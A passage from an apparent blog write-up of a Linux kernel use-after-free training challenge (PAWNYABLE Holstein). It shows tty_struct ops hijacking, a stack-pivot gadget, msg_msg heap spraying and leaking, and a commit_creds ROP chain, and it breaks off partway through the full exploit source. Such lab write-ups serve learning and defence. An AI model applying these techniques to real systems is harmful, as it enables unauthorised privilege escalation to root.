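    void *remove;
    void *open;
    void *close;
    void *shutdown;
    void *cleanup;
    void *write;
    void *put_char;
    void *flush_chars;
    void *write_room;
    void *chars_in_buffer;
    void *ioctl;
};

// Slot index of a member: its byte offset divided by the pointer size
#define OPS_SLOT(member) \
    (offsetof(struct fake_tty_ops, member) / sizeof(void *))
```

<p>With this, <code class="language-plaintext highlighter-rouge">OPS_SLOT(close)</code>, <code class="language-plaintext highlighter-rouge">OPS_SLOT(shutdown)</code>, and <code class="language-plaintext highlighter-rouge">OPS_SLOT(cleanup)</code> come out as 4, 5, and 6, and <code class="language-plaintext highlighter-rouge">OPS_SLOT(ioctl)</code> is 12, which on x86-64 puts the <code class="language-plaintext highlighter-rouge">ioctl</code> pointer at byte offset <code class="language-plaintext highlighter-rouge">0x60</code> in the table.</p>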

<p>So our plan will be to:</p>

<ol>
  <li>Create UAF condition</li>
  <li>Occupy freed memory with <code class="language-plaintext highlighter-rouge">tty_struct</code></li>
  <li>Read a copy of the <code class="language-plaintext highlighter-rouge">tty_struct</code> back to us in userland</li>
  <li>Alter the <code class="language-plaintext highlighter-rouge">tty-&gt;ops</code> value to point to a faked function table that we control</li>
  <li>Write the new data back to the <code class="language-plaintext highlighter-rouge">tty_struct</code> which is now corrupted</li>
  <li>Do something to the <code class="language-plaintext highlighter-rouge">tty_struct</code> that causes a function we control to be invoked</li>
</ol>

<p>PAWNYABLE tells us that a popular handler to target is <code class="language-plaintext highlighter-rouge">ioctl()</code>, as the function takes several arguments which are user-controlled.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span>  <span class="p">(</span><span class="o">*</span><span class="n">ioctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span>
		    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">);</span>
</code></pre></div></div>

<p>From userland, we can supply the values for <code class="language-plaintext highlighter-rouge">cmd</code> and <code class="language-plaintext highlighter-rouge">arg</code>. This gives us some flexibility. The value we can provide for <code class="language-plaintext highlighter-rouge">cmd</code> is somewhat limited as an <code class="language-plaintext highlighter-rouge">unsigned int</code> is only 4 bytes. <code class="language-plaintext highlighter-rouge">arg</code> gives us a full 8 bytes of control over <code class="language-plaintext highlighter-rouge">RDX</code>. Since we can control the contents of <code class="language-plaintext highlighter-rouge">RDX</code> whenever we invoke <code class="language-plaintext highlighter-rouge">ioctl()</code>, we need to find a gadget that pivots the stack to some data in the kernel heap that we control. I found such a gadget here:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
</code></pre></div></div>

<p>The gadget pushes the value in <code class="language-plaintext highlighter-rouge">RDX</code> onto the stack and then pops that value into <code class="language-plaintext highlighter-rouge">RSP</code>, so the stack pointer ends up holding whatever we called <code class="language-plaintext highlighter-rouge">ioctl()</code> with in <code class="language-plaintext highlighter-rouge">arg</code>. It then pops one quadword into <code class="language-plaintext highlighter-rouge">RBP</code> and executes <code class="language-plaintext highlighter-rouge">ret</code>, which means the first 8 bytes at that address are consumed and execution resumes at the address stored in the 8 bytes after them. So the control flow will go something like:</p>

<ol>
  <li>Invoke <code class="language-plaintext highlighter-rouge">ioctl()</code> on our corrupted <code class="language-plaintext highlighter-rouge">tty_struct</code></li>
  <li><code class="language-plaintext highlighter-rouge">ioctl()</code> has been overwritten by a stack-pivot gadget that places the location of our ROP chain into <code class="language-plaintext highlighter-rouge">RSP</code></li>
  <li><code class="language-plaintext highlighter-rouge">ioctl()</code> returns execution to our ROP chain</li>
</ol>
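<p>To convince myself of where execution actually lands after the pivot, it helps to model the gadget on paper. The toy simulation below is not exploit code. It just replays <code class="language-plaintext highlighter-rouge">push rdx; pop rsp; pop rbp; ret</code> against a fake memory array, with the <code class="language-plaintext highlighter-rouge">regs</code> struct and <code class="language-plaintext highlighter-rouge">simulate_pivot</code> being names I made up for the illustration:</p>

```c
#include <stddef.h>
#include <stdint.h>

// Toy register file, just enough to model the gadget
struct regs {
    uint64_t rsp;
    uint64_t rbp;
    uint64_t rip;
};

// Model `push rdx; pop rsp; pop rbp; ret` against a fake memory made of
// 8-byte slots. "Addresses" are byte offsets into `mem`. The xor on eax
// does not affect control flow, so it is ignored here.
void simulate_pivot(const uint64_t *mem, uint64_t rdx, struct regs *r) {
    // push rdx; pop rsp => RSP = RDX
    r->rsp = rdx;

    // pop rbp => RBP takes the first quadword, RSP advances by 8
    r->rbp = mem[r->rsp / 8];
    r->rsp += 8;

    // ret => RIP takes the next quadword, RSP advances by 8 again
    r->rip = mem[r->rsp / 8];
    r->rsp += 8;
}
```

<p>The takeaway is that the first gadget to run is the quadword at <code class="language-plaintext highlighter-rouge">arg + 8</code>, not the one at <code class="language-plaintext highlighter-rouge">arg</code>, because of the <code class="language-plaintext highlighter-rouge">pop rbp</code> in the middle of the gadget.</p>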

<p>So now we have a new problem: how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?</p>

<h2 id="creatinglocating-a-rop-chain-and-fake-function-table">Creating/Locating a ROP Chain and Fake Function Table</h2>

<p>This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the <a href="https://elixir.bootlin.com/linux/latest/source/include/linux/msg.h#L9"><code class="language-plaintext highlighter-rouge">msg_msg</code></a> struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:</p>

<ul>
  <li>Stores arbitrary data inline in the structure body (not via a pointer to the heap)</li>
  <li>Contains a linked-list member that contains the addresses to <code class="language-plaintext highlighter-rouge">prev</code> and <code class="language-plaintext highlighter-rouge">next</code> messages within the same kernel message queue</li>
</ul>

<p>So quickly, a strategy began to form. We could:</p>

<ol>
  <li>Create our ROP chain and fake function table in a buffer</li>
  <li>Send the buffer as the body of a <code class="language-plaintext highlighter-rouge">msg_msg</code> struct</li>
  <li>Use our <code class="language-plaintext highlighter-rouge">module_read</code> capability to read the <code class="language-plaintext highlighter-rouge">msg_msg-&gt;list.next</code> and <code class="language-plaintext highlighter-rouge">msg_msg-&gt;list.prev</code> values to know where in the heap at least two of our messages were stored</li>
</ol>
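<p>To make step 3 a bit more concrete, here is a sketch of how the leaked bytes could be interpreted. The struct below is a userland mirror of the kernel’s <code class="language-plaintext highlighter-rouge">struct msg_msg</code> header as laid out on x86-64 (48 bytes, with the message body immediately after it). The names <code class="language-plaintext highlighter-rouge">msg_msg_hdr</code> and <code class="language-plaintext highlighter-rouge">parse_msg_msg</code> are hypothetical and not taken from my exploit:</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Userland mirror of the kernel's struct msg_msg header on x86-64.
// The message body follows immediately after these 48 bytes.
struct msg_msg_hdr {
    uint64_t list_next;  // m_list.next
    uint64_t list_prev;  // m_list.prev
    int64_t  m_type;     // message type passed to msgsnd()
    uint64_t m_ts;       // message text size
    uint64_t next;       // pointer to the first msg_msgseg, if any
    uint64_t security;   // LSM blob pointer
};

#define MSG_HDR_SZ sizeof(struct msg_msg_hdr)

// Hypothetical helper: copy a header out of leaked bytes.
// Returns 0 on success, or -1 if the leak is too short or the type is
// not the one we sprayed with.
int parse_msg_msg(const unsigned char *leak, size_t len, int64_t want_type,
                  struct msg_msg_hdr *out) {
    if (len < MSG_HDR_SZ) {
        return -1;
    }

    // memcpy avoids unaligned and aliasing-unsafe pointer casts
    memcpy(out, leak, MSG_HDR_SZ);

    return out->m_type == want_type ? 0 : -1;
}
```

<p>After a successful parse, <code class="language-plaintext highlighter-rouge">list_next</code> and <code class="language-plaintext highlighter-rouge">list_prev</code> are the candidate heap addresses of neighboring messages in the same queue.</p>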

<p>With this ability, we would know exactly what address to supply as an argument to <code class="language-plaintext highlighter-rouge">ioctl()</code> when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Allocate one msg_msg on the heap</span>
<span class="kt">size_t</span> <span class="nf">send_message</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// Calculate current queue</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">num_queue</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`send_message()` called with no message queues"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="kt">int</span> <span class="n">curr_q</span> <span class="o">=</span> <span class="n">msg_queue</span><span class="p">[</span><span class="n">num_queue</span> <span class="o">-</span> <span class="mi">1</span><span class="p">];</span>

    <span class="c1">// Send message</span>
    <span class="kt">size_t</span> <span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">msgbuf</span> <span class="p">{</span>
        <span class="kt">long</span> <span class="n">mtype</span><span class="p">;</span>
        <span class="kt">char</span> <span class="n">mtext</span><span class="p">[</span><span class="n">MSG_SZ</span><span class="p">];</span>
    <span class="p">}</span> <span class="n">msg</span><span class="p">;</span>

    <span class="c1">// Unique identifier we can use</span>
    <span class="n">msg</span><span class="p">.</span><span class="n">mtype</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>

    <span class="c1">// Construct the ROP chain</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MSG_SZ</span><span class="p">);</span>

    <span class="c1">// Pattern for offsets (debugging)</span>
    <span class="kt">uint64_t</span> <span class="n">base</span> <span class="o">=</span> <span class="mh">0x41</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">curr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">25</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">uint64_t</span> <span class="n">fill</span> <span class="o">=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">56</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">48</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">40</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">24</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">16</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span><span class="p">;</span>
        
        <span class="o">*</span><span class="n">curr</span><span class="o">++</span> <span class="o">=</span> <span class="n">fill</span><span class="p">;</span>
        <span class="n">base</span><span class="o">++</span><span class="p">;</span> 
    <span class="p">}</span>

    <span class="c1">// ROP chain</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">rop</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">pop_rdi</span><span class="p">;</span> 
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span> <span class="c1">// RAX now holds ptr to new creds</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">xchg_rdi_rax</span><span class="p">;</span> <span class="c1">// Place creds into RDI </span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">commit_creds</span><span class="p">;</span> <span class="c1">// Now we have super powers</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">kpti_tramp</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// pop rax inside kpti_tramp</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// pop rdi inside kpti_tramp</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">pop_shell</span><span class="p">;</span> <span class="c1">// Return here</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span>   <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span>

    <span class="cm">/* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */</span>

    <span class="c1">// Populate the 12 function pointers in the table that we have created.</span>
    <span class="c1">// There are 3 handlers that are invoked for allocated tty_structs when </span>
    <span class="c1">// their controlling process exits, they are close(), shutdown(),</span>
    <span class="c1">// and cleanup(). We have to overwrite these pointers for when we exit our</span>
    <span class="c1">// exploit process or else the kernel will panic with a RIP of </span>
    <span class="c1">// 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">func_table</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="n">rop_len</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">12</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// If i == 4, we're on the close() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">4</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// If i == 5, we're on the shutdown() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// If i == 6, we're on the cleanup() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">6</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// Magic value for debugging</span>
        <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0xdeadbeefdeadbe00</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Put our gadget address as the ioctl() handler to pivot stack</span>
    <span class="o">*</span><span class="n">func_table</span> <span class="o">=</span> <span class="n">push_rdx</span><span class="p">;</span>

    <span class="c1">// Spray msg_msg's on the heap</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">msgsnd</span><span class="p">(</span><span class="n">curr_q</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">,</span> <span class="n">MSG_SZ</span><span class="p">,</span> <span class="n">IPC_NOWAIT</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fails</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">fails</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state; I wanted to exit cleanly. This presented a problem as we are completely hijacking the <code class="language-plaintext highlighter-rouge">ops</code> function table, which the kernel will use to clean up our <code class="language-plaintext highlighter-rouge">tty_struct</code>. So I found a gadget that simply performs a <code class="language-plaintext highlighter-rouge">ret</code> operation, and overwrote the function pointers for <code class="language-plaintext highlighter-rouge">close()</code>, <code class="language-plaintext highlighter-rouge">shutdown()</code>, and <code class="language-plaintext highlighter-rouge">cleanup()</code> so that when they are invoked, they simply return. The kernel is apparently fine with this and doesn’t panic.</p>

<p>So our message body looks something like:
&lt;----ROP----Faked Function Table----&gt;</p>
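<p>Given that layout, all of the addresses we care about fall out of a single leaked <code class="language-plaintext highlighter-rouge">msg_msg</code> pointer with a bit of arithmetic. The sketch below shows one way to do that math. The names are hypothetical, <code class="language-plaintext highlighter-rouge">0x30</code> is the size of the <code class="language-plaintext highlighter-rouge">msg_msg</code> header on x86-64, and backing the <code class="language-plaintext highlighter-rouge">ioctl()</code> argument up by 8 bytes is my assumption based on the <code class="language-plaintext highlighter-rouge">pop rbp</code> in the pivot gadget, so treat it as a starting point rather than exactly what the full exploit does:</p>

```c
#include <stdint.h>

#define MSG_MSG_HDR_SZ 0x30ULL  // sizeof(struct msg_msg) on x86-64

// Addresses derived from one leaked msg_msg pointer
struct payload_addrs {
    uint64_t rop;         // first gadget of the ROP chain
    uint64_t fake_table;  // start of the faked tty_operations
    uint64_t pivot_arg;   // value to pass as the ioctl() arg
};

// Hypothetical helper: msg_addr is the kernel address of a sprayed
// msg_msg, rop_len is the size of the ROP chain in bytes.
struct payload_addrs locate_payload(uint64_t msg_addr, uint64_t rop_len) {
    struct payload_addrs a;

    // The message body starts right after the header
    a.rop = msg_addr + MSG_MSG_HDR_SZ;

    // The faked table follows the chain inside mtext
    a.fake_table = a.rop + rop_len;

    // Assumption: leave 8 bytes for the gadget's pop rbp to consume
    a.pivot_arg = a.rop - 8;

    return a;
}
```

<p>With the 13-quadword chain from <code class="language-plaintext highlighter-rouge">send_message()</code>, <code class="language-plaintext highlighter-rouge">rop_len</code> would be <code class="language-plaintext highlighter-rouge">13 * 8</code> bytes.</p>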

<p>Here is the code I used to overwrite the <code class="language-plaintext highlighter-rouge">tty_struct-&gt;ops</code> pointer:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">overwrite_ops</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">g_buf</span><span class="p">[</span><span class="n">GBUF_SZ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Overwrite the tty_struct-&gt;ops pointer with the fake table address</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_buf</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">fake_table</span><span class="p">;</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_written</span> <span class="o">=</span> <span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_written</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to write enough bytes to fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.</p>

<p>As a first timer, this tiny bit of creativity to leverage the read ability to leak the addresses of <code class="language-plaintext highlighter-rouge">msg_msg</code> structs was enough to get me hooked. Here is a picture of the exploit in action:
<img src="/assets/images/pwn/exploit_works.PNG" alt="" /></p>

<h2 id="miscellaneous">Miscellaneous</h2>

<p>There were some things I tried to do to increase the exploit’s reliability.</p>

<p>One was to check the magic value in the leaked <code class="language-plaintext highlighter-rouge">tty_structs</code> to make sure a <code class="language-plaintext highlighter-rouge">tty_struct</code> had actually filled our freed memory and not another object. This is extremely convenient! All <code class="language-plaintext highlighter-rouge">tty_structs</code> have <code class="language-plaintext highlighter-rouge">0x5401</code> at <code class="language-plaintext highlighter-rouge">tty-&gt;magic</code>.</p>

<p>Another thing I did was spray <code class="language-plaintext highlighter-rouge">msg_msg</code> structs with an easily recognizable message type of <code class="language-plaintext highlighter-rouge">0x1337</code>. This way when leaked, I could easily verify I was in fact leaking <code class="language-plaintext highlighter-rouge">msg_msg</code> contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with <code class="language-plaintext highlighter-rouge">0xffff</code>.</p>

<p>Finally, there was the patching of the clean-up-related function pointers in <code class="language-plaintext highlighter-rouge">tty-&gt;ops</code>.</p>

<h2 id="further-reading">Further Reading</h2>

<p>PAWNYABLE has lots of challenges besides the UAF one, so please go check them out. One of the primary reasons I wrote this was to get the author’s project more visitors and beneficiaries. It has made a big difference for me, and in the nearly one month since I finished this challenge, I have learned a ton. Special thanks to <a href="https://twitter.com/chompie1337">@chompie1337</a> for letting me complain and giving me helpful advice/resources.</p>

<p>Some awesome blogposts I read throughout the learning process up to this point include:</p>

<ul>
  <li>https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel</li>
  <li>https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html</li>
  <li>https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/</li>
  <li>https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html</li>
</ul>

<h2 id="exploit-code">Exploit Code</h2>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// One liner to add exploit to filesystem</span>
<span class="c1">// gcc exploit.c -o exploit -static &amp;&amp; cp exploit rootfs &amp;&amp; cd rootfs &amp;&amp; find . -print0 | cpio -o --format=newc --null --owner=root &gt; ../rootfs.cpio &amp;&amp; cd ../</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="c1"> /* int_t's */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* getuid */</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="c1"> /* memset */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/ipc.h&gt;</span><span class="c1"> /* msg_msg */ </span><span class="cp">
#include</span> <span class="cpf">&lt;sys/msg.h&gt;</span><span class="c1"> /* msg_msg */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/ioctl.h&gt;</span><span class="c1"> /* ioctl */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdarg.h&gt;</span><span class="c1"> /* va_args */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdbool.h&gt;</span><span class="c1"> /* true, false */ </span><span class="cp">
</span>
<span class="cp">#define DEV "/dev/holstein"
#define PTMX "/dev/ptmx"
</span>
<span class="cp">#define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
#define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
#define NUM_QUEUE (size_t)4         // Number of msg queues
#define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
#define GBUF_SZ (size_t)0x400       // Size of g_buf in driver
</span>
<span class="c1">// User state globals</span>
<span class="kt">uint64_t</span> <span class="n">user_cs</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">user_ss</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">user_rflags</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">user_sp</span><span class="p">;</span>

<span class="c1">// Mutable globals, when in Rome</span>
<span class="kt">uint64_t</span> <span class="n">base</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">rop_addr</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">fake_table</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">ioctl_ptr</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">open_ptmx</span><span class="p">[</span><span class="n">PTMX_SPRAY</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>          <span class="c1">// Store fds for clean up/ioctl()</span>
<span class="kt">int</span> <span class="n">num_ptmx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>                           <span class="c1">// Number of open fds</span>
<span class="kt">int</span> <span class="n">msg_queue</span><span class="p">[</span><span class="n">NUM_QUEUE</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>           <span class="c1">// Initialized message queues</span>
<span class="kt">int</span> <span class="n">num_queue</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Misc constants. </span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">rop_len</span> <span class="o">=</span> <span class="mi">200</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">ioctl_off</span> <span class="o">=</span> <span class="mi">12</span> <span class="o">*</span> <span class="nf">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">);</span>

<span class="c1">// Gadgets</span>
<span class="c1">// 0x723c0: commit_creds</span>
<span class="kt">uint64_t</span> <span class="n">commit_creds</span><span class="p">;</span>
<span class="c1">// 0x72560: prepare_kernel_cred</span>
<span class="kt">uint64_t</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span>
<span class="c1">// 0x800e10: swapgs_restore_regs_and_return_to_usermode</span>
<span class="kt">uint64_t</span> <span class="n">kpti_tramp</span><span class="p">;</span>
<span class="c1">// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)</span>
<span class="kt">uint64_t</span> <span class="n">push_rdx</span><span class="p">;</span>
<span class="c1">// 0x35738d: pop rdi; ret;</span>
